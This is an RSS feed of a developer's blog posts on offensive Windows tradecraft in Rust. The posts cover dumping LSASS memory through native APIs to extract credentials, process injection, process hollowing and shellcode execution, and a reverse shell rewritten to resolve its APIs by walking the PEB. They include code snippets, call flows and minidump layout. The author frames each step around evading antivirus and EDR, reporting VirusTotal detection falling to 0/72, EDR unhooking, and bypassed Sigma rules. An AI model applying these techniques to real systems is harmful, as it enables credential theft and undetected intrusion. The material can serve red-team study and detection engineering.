Forem: windasunnie The latest articles on Forem by windasunnie (@windasunnie). https://forem.com/windasunnie https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1406790%2Fe192905c-91f0-4118-8d3e-268a4dfbe1e6.jpeg Forem: windasunnie https://forem.com/windasunnie en LSASS Memory Dumping Using Native Windows APIs windasunnie Thu, 02 Oct 2025 07:53:47 +0000 https://forem.com/windasunnie/lsass-memory-dumping-using-native-windows-apis-2ak https://forem.com/windasunnie/lsass-memory-dumping-using-native-windows-apis-2ak <p>Using low-level Windows Native API functions dump LSASS process memory</p> <h2> Prerequisites: Enabling SeDebugPrivilege </h2> <p>Since <code>lsass.exe</code> is a protected system process, we must first enable the <code>SeDebugPrivilege</code> to gain the necessary permissions. This privilege allows our process to open handles to protected processes and read their memory.</p> <h2> Step 1: Enumerating Running Processes </h2> <p>We use the <code>NtQuerySystemInformation</code> API with the <code>SystemProcessInformation</code> (value: 5) information class to retrieve an array of <code>SYSTEM_PROCESS_INFORMATION</code> structures containing details about all running processes. Replace using <code>CreateToolhelp32Snapshot</code> create snapshot.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">let</span> <span class="n">status</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">NtQuerySystemInformation</span><span class="p">(</span> <span class="mi">5</span><span class="p">,</span> <span class="c1">// SystemProcessInformation</span> <span class="n">buffer</span><span class="nf">.as_mut_ptr</span><span class="p">()</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">c_void</span><span class="p">,</span> <span class="n">length</span><span class="p">,</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">length</span><span class="p">,</span> <span class="p">)</span> <span class="p">};</span> </code></pre> </div> <p>The SYSTEM_PROCESS_INFORMATION structure contains various process details, including the process name stored in Unicode format:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">pub</span> <span class="k">struct</span> <span class="n">SystemProcessInformation</span> <span class="p">{</span> <span class="o">...</span> <span class="k">pub</span> <span class="n">image_name</span><span class="p">:</span> <span class="n">UnicodeString</span><span class="p">,</span> <span class="o">...</span> <span class="p">}</span> </code></pre> </div> <p>I iterate through the returned structures in a while loop, searching for the process with the image name matching "lsass.exe".</p> <p>To make the process names human-readable, we convert the Unicode strings to standard Rust strings. This conversion will later be replaced with DJB2 hash-based obfuscation for evasion purposes.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">if</span> <span class="o">!</span><span class="n">name_addr</span><span class="nf">.is_null</span><span class="p">()</span> <span class="o">&amp;&amp;</span> <span class="n">name_len</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="p">{</span> <span class="k">let</span> <span class="n">wide_slice</span><span class="p">:</span> <span class="o">&amp;</span><span class="p">[</span><span class="nb">u16</span><span class="p">]</span> <span class="o">=</span> <span class="nn">core</span><span class="p">::</span><span class="nn">slice</span><span class="p">::</span><span class="nf">from_raw_parts</span><span class="p">(</span> <span class="n">name_addr</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u16</span><span class="p">,</span> <span class="p">(</span><span class="n">name_len</span> <span class="o">/</span> <span class="mi">2</span><span class="p">)</span> <span class="k">as</span> <span class="nb">usize</span> <span class="p">);</span> <span class="k">let</span> <span class="n">os</span> <span class="o">=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">ffi</span><span class="p">::</span><span class="nn">OsString</span><span class="p">::</span><span class="nf">from_wide</span><span class="p">(</span><span class="n">wide_slice</span><span class="p">);</span> <span class="k">let</span> <span class="n">name</span> <span class="o">=</span> <span class="n">os</span><span class="nf">.to_string_lossy</span><span class="p">()</span><span class="nf">.into_owned</span><span class="p">();</span> <span class="c1">// println!("Process name = {}", name);</span> <span class="c1">// println!("Name Addr: {:?}", name_addr);</span> <span class="c1">// println!("Name len: {}", name_len);</span> <span class="o">...</span> <span class="p">}</span> </code></pre> </div> <h2> Step 2: Querying LSASS Process Information </h2> <p>Once we obtain a handle to the <code>lsass.exe</code> process, we need to locate the <code>lsasrv.dll</code> module, which contains the credential storage mechanisms. We use <code>NtQueryInformationProcess</code> with the <code>ProcessBasicInformation</code> class (value: 0) to retrieve the Process Environment Block (PEB) address.</p> <p>Use <code>NtQueryInformationProcess</code> query lsass.exe process information<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">let</span> <span class="k">mut</span> <span class="n">status</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">NtQueryInformationProcess</span><span class="p">(</span> <span class="n">process_handle</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">c_void</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="c1">// ProcessBasicInformation</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">process_information</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="n">_</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">c_void</span><span class="p">,</span> <span class="nn">core</span><span class="p">::</span><span class="nn">mem</span><span class="p">::</span><span class="nn">size_of</span><span class="p">::</span><span class="o">&lt;</span><span class="n">ProcessBasicInformation</span><span class="o">&gt;</span><span class="p">()</span> <span class="k">as</span> <span class="nb">u32</span><span class="p">,</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">return_length</span><span class="p">,</span> <span class="p">)</span> <span class="p">};</span> </code></pre> </div> <h2> Step 3: Traversing the PEB to Find lsasrv.dll </h2> <p>Since we're querying another process's memory space, we cannot directly access its PEB. Instead, we must read the target process's virtual memory using <code>NtReadVirtualMemory</code>. By traversing the PEB structure and reading the loader data structures, we can enumerate loaded modules and locate <code>lsasrv.dll</code>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">let</span> <span class="n">status</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">NtReadVirtualMemory</span><span class="p">(</span> <span class="n">process_handle</span><span class="p">,</span> <span class="n">mem_address</span><span class="p">,</span> <span class="n">buffer</span><span class="nf">.as_mut_ptr</span><span class="p">()</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">c_void</span><span class="p">,</span> <span class="n">buffer</span><span class="nf">.len</span><span class="p">(),</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">bytes_read</span><span class="p">,</span> <span class="p">)</span> <span class="p">};</span> </code></pre> </div> <h2> Step 4: Querying Virtual Memory Information </h2> <p>After locating the <code>lsasrv.dll</code> base address, we use <code>NtQueryVirtualMemory</code> to retrieve detailed information about the memory regions.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">let</span> <span class="n">result</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">NtQueryVirtualMemory</span><span class="p">(</span> <span class="n">process_handle</span><span class="p">,</span> <span class="n">base_address</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">mem_info</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="n">_</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">c_void</span><span class="p">,</span> <span class="nn">core</span><span class="p">::</span><span class="nn">mem</span><span class="p">::</span><span class="nn">size_of</span><span class="p">::</span><span class="o">&lt;</span><span class="n">MemoryBasicInformation</span><span class="o">&gt;</span><span class="p">()</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span> <span class="nf">null_mut</span><span class="p">()</span> <span class="p">)</span> <span class="p">};</span> </code></pre> </div> <h2> Understanding Windows Virtual Memory Structure </h2> <p>Windows virtual memory is organized into <strong>pages</strong>, with the standard page size being 4KB (0x1000 bytes). A process's virtual address space is divided into numerous pages, each with its own state, protection attributes, and base address.</p> <h3> MEMORY_BASIC_INFORMATION Structure </h3> <p>When calling <code>VirtualQueryEx</code> (or <code>NtQueryVirtualMemory</code>), the system returns a <code>MEMORY_BASIC_INFORMATION</code> structure containing critical fields:</p> <ul> <li> <strong>BaseAddress</strong>: The starting virtual address of the memory region</li> <li> <strong>RegionSize</strong>: The size of this region (typically multiple pages combined)</li> <li> <p><strong>State</strong>: <br> The allocation state of the memory:</p> <ul> <li> <code>MEM_COMMIT</code>: Memory is allocated and backed by physical pages (accessible)</li> <li> <code>MEM_RESERVE</code>: Address space is reserved but not backed by physical memory</li> <li> <code>MEM_FREE</code>: Memory is not allocated</li> </ul> </li> <li> <p><strong>Protect</strong>: Access permissions for the pages:</p> <ul> <li> <code>PAGE_NOACCESS</code>: No access allowed</li> <li> <code>PAGE_READONLY</code>: Read-only access</li> <li> <code>PAGE_READWRITE</code>: Read and write access</li> <li> <code>PAGE_EXECUTE_READWRITE</code>: Execute, read, and write access</li> <li> <code>PAGE_GUARD</code>: Guard page for debugging or exception triggering </li> </ul> </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>let mut mem_info: MemoryBasicInformation = unsafe { core::mem::zeroed() }; let result = unsafe { NtQueryVirtualMemory( process_handle, base_address, 0, &amp;mut mem_info as *mut _ as *mut c_void, core::mem::size_of::&lt;MemoryBasicInformation&gt;() as usize, null_mut() ) }; </code></pre> </div> <h2> Step 5: Filtering Valid Memory Regions </h2> <p>We establish the boundaries for memory scanning:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="c1">// Initialize variables for memory region traversal and dumping.</span> <span class="k">let</span> <span class="k">mut</span> <span class="n">memory_address</span><span class="p">:</span> <span class="nb">usize</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">// Start memory address for dumping.</span> <span class="k">let</span> <span class="n">max_memory_address</span><span class="p">:</span> <span class="nb">usize</span> <span class="o">=</span> <span class="mi">0x7FFF_FFFE_FFFF</span><span class="p">;</span> <span class="c1">// Maximum user-mode </span> </code></pre> </div> <p>We need to skip unreadable or unallocated memory blocks. We only process memory regions that are committed (MEM_COMMIT) and have at least some access permissions (not PAGE_NOACCESS).<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">if</span> <span class="n">memory_info</span><span class="py">.protect</span> <span class="o">!=</span> <span class="n">PAGE_NOACCESS</span> <span class="o">&amp;&amp;</span> <span class="n">memory_info</span><span class="py">.state</span> <span class="o">==</span> <span class="n">MEM_COMMIT</span> <span class="p">{</span> <span class="o">...</span> <span class="p">}</span> </code></pre> </div> <h3> Handling Memory Region Boundaries </h3> <p><code>NtQueryVirtualMemory</code> returns a region that may contain one or multiple pages. Sometimes a region is only one page size (0x1000 bytes), which typically indicates:</p> <ul> <li>Special protection boundaries</li> <li>Guard pages</li> <li>Specific allocation patterns</li> </ul> <p>When performing memory dumps or module scanning, we need to merge adjacent regions to correctly capture complete modules.</p> <h3> Region Merging Logic </h3> <p>We check if <code>region_size</code> equals 0x1000. If so, this typically indicates the beginning of a new module. We then accumulate subsequent regions. Finally, we use <code>NtReadVirtualMemory</code> to convert the memory region into raw bytes and write them to our dump buffer.</p> <h2> Step 6: Creating a Minidump File </h2> <p>The final step involves constructing a binary file similar to a Windows minidump (MDMP format) with the following structure:</p> <ol> <li> <strong>Header</strong> (fixed 32 bytes, including signature "MDMP")</li> <li> <strong>Stream Directory</strong> (each stream entry = 12 bytes: streamType (u32), size (u32), offset (u32))</li> <li> <strong>SystemInfo Stream</strong> (fixed 56 bytes implementation, varies by OS version)</li> <li> <strong>ModuleList Stream</strong> (contains module entries + module path blocks)</li> <li> <strong>Memory64List Stream</strong> (contains memory-region list + offset pointing to actual memory bytes)</li> <li> <strong>regions_memdump</strong> (actual memory bytes read, placed at the end of the file)</li> </ol> <h2> Testing and Results </h2> <p>We can verify the dump file using pypykatz:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>C:\&gt; pypykatz lsa minidump hello.dmp </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgbzmfm0yfolzgbuu3apg.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgbzmfm0yfolzgbuu3apg.png" alt="pypykatz minidump" width="800" height="385"></a></p> <h3> Examining the Import Address Table (IAT) </h3> <p>Using PeStudio to inspect the IAT reveals the imported functions:<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fz5bomi6bmaojw93il0ms.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fz5bomi6bmaojw93il0ms.png" alt="pestudio show IAT" width="800" height="399"></a></p> <p>The detection is likely due to not implementing DJB2 or other hash-based obfuscation methods for API calls.</p> <h3> Antivirus Evasion Results </h3> <p>Initial VirusTotal scan detected 1/72:<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr53dpw8hxr6puyxi2z80.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr53dpw8hxr6puyxi2z80.png" alt=" " width="800" height="375"></a></p> <p>However, rule-based detection systems are relatively easy to bypass. After minor modifications and re-uploading, the detection rate dropped to 0/72:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmnvs32hql7teq95il2oa.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmnvs32hql7teq95il2oa.png" alt=" " width="800" height="408"></a></p> security kernel minidump Exploring Process Injection, Hollowing, and Shellcode Execution in Windows windasunnie Wed, 10 Sep 2025 09:25:42 +0000 https://forem.com/windasunnie/exploring-process-injection-hollowing-and-shellcode-execution-in-windows-kom https://forem.com/windasunnie/exploring-process-injection-hollowing-and-shellcode-execution-in-windows-kom <p>Since reverse shell files typically transmit non-HTTP requests, I developed a separate payload to dump the lsass.exe process.</p> <h1> Dump lsass </h1> <p>First, I obtain a snapshot to locate the PID of lsass.exe, then use OpenProcess to establish a handle:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>// 2. Call OpenProcess (PROCESS_ALL_ACCESS), get lsass.exe handle let lsass_handle = OpenProcess( PROCESS_ALL_ACCESS, 0, lsass_pid ); </code></pre> </div> <p>I then utilize the MiniDumpWriteDump function<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>let success = MiniDumpWriteDump( lsass_handle, lsass_pid, dump_file.as_raw_handle() as windows_sys::Win32::Foundation::HANDLE, dump_type, null(), null(), null() ); </code></pre> </div> <p>The dump of lsass.exe was successfully obtained.<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb71qrnfnrdp3c4zn69fy.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb71qrnfnrdp3c4zn69fy.png" alt=" " width="800" height="78"></a></p> <p>Using PEStudio to analyze the Import Address Table (IAT)<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzpy0jrwu1dv8iqtlpvii.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzpy0jrwu1dv8iqtlpvii.png" alt=" " width="800" height="463"></a><br> As shown here, the Import Address Table (IAT) clearly contains suspicious function calls such as MiniDumpWriteDump, which are easily identifiable indicators of malicious behavior.</p> <p>VirusTotal Analysis:<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2ddc4a9cvdv0ehp7elpj.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2ddc4a9cvdv0ehp7elpj.png" alt=" " width="800" height="434"></a><br> Detection rate: 8/72</p> <p>Notably, Microsoft's Defender flagged the sample on VirusTotal, while most other AV and EDR vendor engines did not mark it as malicious.</p> <p>The analysis also flagged the dumping of sensitive information files.<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsfecuwg26x80c3duu8pa.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsfecuwg26x80c3duu8pa.png" alt=" " width="800" height="105"></a></p> <h1> Valloc </h1> <blockquote> <p>The executable file was converted into a raw binary format.</p> </blockquote> <p>I leveraged VirtualAlloc to allocate a region of memory with executable permissions, into which the shellcode was written and subsequently executed.</p> <p>VirusTotal: <br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl5s4jz7f161rlf9zitzu.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl5s4jz7f161rlf9zitzu.png" alt=" " width="800" height="820"></a><br> Detection rate: 36/72</p> <p>By using x64dbg’s trace feature, it is easy to quickly observe when kernel32.dll calls <code>VirtualAlloc</code>.<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl3414gimsdp8sovx3xe8.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl3414gimsdp8sovx3xe8.png" alt=" " width="800" height="65"></a></p> <h1> Valloc pointer </h1> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr6i815qcvllqfl3b94ol.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr6i815qcvllqfl3b94ol.png" alt=" " width="800" height="752"></a><br> Detection rate: 30/72</p> <p>Also easy to observe kernel32.dll calls <code>VirtualAlloc</code> by x64dbg.<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj05nhrubnavhuhbicdc8.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj05nhrubnavhuhbicdc8.png" alt=" " width="800" height="63"></a></p> <h1> Process Injection </h1> <p>I use OpenProcess open a handle, allocate executable memory, then write shellcode into the allocated memory. Execute the shellcode with a remote thread.</p> <p>VirusTotal:<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frqgz2lrj47gsu4r8mr8z.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frqgz2lrj47gsu4r8mr8z.png" alt=" " width="800" height="670"></a><br> Detection rate: 23/72</p> <p>Using x64dbg, it is straightforward to observe kernel32.dll invoking <code>VirtualAlloc</code>.<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhfmh6fsvsf3123svwp8k.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhfmh6fsvsf3123svwp8k.png" alt=" " width="800" height="89"></a></p> <p><code>WriteProcessMemory</code><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcn4c3t4t7od49hn4whui.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcn4c3t4t7od49hn4whui.png" alt=" " width="800" height="39"></a></p> <p><code>CreateRemoteThread</code><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7o8eb1rvcqx1npl8edzy.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7o8eb1rvcqx1npl8edzy.png" alt=" " width="800" height="43"></a></p> <h1> Process Hollowing </h1> <p>VirusTotal:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feiejdxeb38izgfg2fs2v.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feiejdxeb38izgfg2fs2v.png" alt=" " width="800" height="699"></a><br> Detection rate: 22/72</p> <p>Similarly as process injection, but not use VirtualAlloc.</p> <h1> Process Hollowing Antistring </h1> <p>In order to evade EDR monitoring, I employ unhooking methods to bypass hooked APIs.</p> <p>VirusTotal:<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhp19hudhu1nog8nb8ass.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhp19hudhu1nog8nb8ass.png" alt=" " width="800" height="522"></a><br> Detection rate: 5/72 (!)</p> <p>I rename the dump file to txt extension file. But still get rate 5/72<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fz5yex4vd0fes59yolcjh.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fz5yex4vd0fes59yolcjh.png" alt=" " width="800" height="384"></a></p> <p>CrowdStrike Falcon change Win/malicious_confidence_70% (D) to Win/malicious_confidence_60% (D)</p> <p>Bypass Sigma Rules!</p> <p>2025/09/23 Edit:</p> <p>After re-analyzing the sample on September 18, I observed clear shellcode indicators.<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fiidmxsba9c557chiwinp.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fiidmxsba9c557chiwinp.png" alt=" " width="800" height="732"></a></p> <h1> The Next </h1> <p>I’ve decided <strong>not</strong> to convert the payload to shellcode for now. Instead, I will resolve all Win32 APIs to native/syscall entry points and, without using <code>MiniDumpWriteDump</code>, collect LSASS process data and extract the required artifacts directly from memory.</p> shellcode rust security valloc Building a Reverse Shell in Rust Using PEB Techniques windasunnie Tue, 03 Jun 2025 16:30:12 +0000 https://forem.com/windasunnie/building-a-reverse-shell-in-rust-using-peb-techniques-4hhe https://forem.com/windasunnie/building-a-reverse-shell-in-rust-using-peb-techniques-4hhe <p>This post documents my exploration of implementing a reverse shell in Rust, starting from a standard API approach, and gradually shifting toward a stealthier variant that leverages manual parsing of the Process Environment Block (PEB). The goal is to reduce detection by Antivirus (AV) and Endpoint Detection and Response (EDR) engines.</p> <h2> Initial Implementation: Traditional API Call Chain </h2> <p>To begin, I created a basic reverse shell using the typical Windows API calls. The logic flow is straightforward and relies on functions exposed by common system libraries like <code>Ws2_32.dll</code> and <code>kernel32.dll</code>.</p> <h3> Reverse Shell Flow </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>WSASocket ↓ inet_pton ↓ connect ↓ GetSystemDirectoryA ↓ Initialize STARTUPINFOA ↓ Set lpCommandLine ↓ Initialize SECURITY_ATTRIBUTES ↓ CreateProcessA ↓ Finish </code></pre> </div> <ul> <li> <strong>WSASocket / connect / inet_pton</strong>: Used to set up a TCP connection to the remote host.</li> <li> <strong>GetSystemDirectoryA</strong>: Retrieves the system path, used to locate cmd.exe.</li> <li> <strong>STARTUPINFOA / SECURITY_ATTRIBUTES / CreateProcessA</strong>: Used to spawn a new process (cmd.exe) with redirected input/output over the socket.</li> </ul> <p>After compiling the shell, I submitted the resulting binary to VirusTotal. The community score was 28/72 — meaning 28 out of 72 AV/EDR engines flagged the executable as malicious. Most detections explicitly identified it as a reverse shell, which is expected due to the predictable API usage.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe6z2rhacjn3kbbao5y70.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe6z2rhacjn3kbbao5y70.png" alt=" " width="800" height="353"></a></p> <h2> Improved Version: PEB-Based API Resolution </h2> <p>To evade static detection signatures, I rewrote the shell to resolve necessary APIs dynamically by walking the PEB instead of relying on the standard Windows API imports. This eliminates the need for a conventional import table and makes detection more difficult for AV engines relying on heuristic patterns or IAT analysis.</p> <h3> Revised Flow with Manual API Resolution </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>WSAStartup (resolved from PEB) ↓ WSASocket (resolved from PEB) 